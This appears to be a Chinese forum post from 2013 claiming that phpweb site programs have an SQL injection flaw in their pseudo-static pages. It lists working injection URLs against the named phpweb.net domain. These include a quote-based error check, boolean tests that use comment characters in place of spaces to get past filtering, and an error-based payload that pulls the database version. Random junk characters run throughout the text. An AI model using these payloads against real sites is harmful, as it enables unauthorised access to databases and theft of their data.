phpweb所有的整站程序伪静态页面都存在sql注入2 \; G: e" `, P }4 [& A
4 H- @& i) ^4 B' F7 d% i. {主站:http://phpweb.net/9 Z+ B. A" h# Y
加’检测:
) B" m$ B6 i+ H8 o1 `( B% U p & T% K& Q( Q" o, G K; S
http://www.phpweb.net/down/html/?772′.html
0 L/ R1 {! _- W7 m . n# X0 P* j' @6 k, V! b0 k
出错/ R% F4 a4 n1 b
存在注入。
" l7 ` x$ m7 K9 v* i4 a不能用空格,只能用/*罗/ x$ a$ O1 {: S) M
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常( R( U5 Z+ B4 B G0 J
2 Z/ R+ k( q; n: phttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.4 q; k' h: S9 |$ I5 J, N3 j
爆数据库版本:- H- Y9 s) D8 ~5 u( N5 l5 g
' V7 L1 ?6 x# L! h- H$ i4 ~: J2 a
?& T7 A5 q9 Z4 s7 Q
17 Q0 B7 D8 K( B% C% i; g* h; W
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
& x& b+ f- N$ w0 z5 E: S更新日期: 2013-01-03 13:39:50
7 o0 E! u9 r/ S! [& p |
发表于 2013-1-4 19:46:42
收藏
支持
反对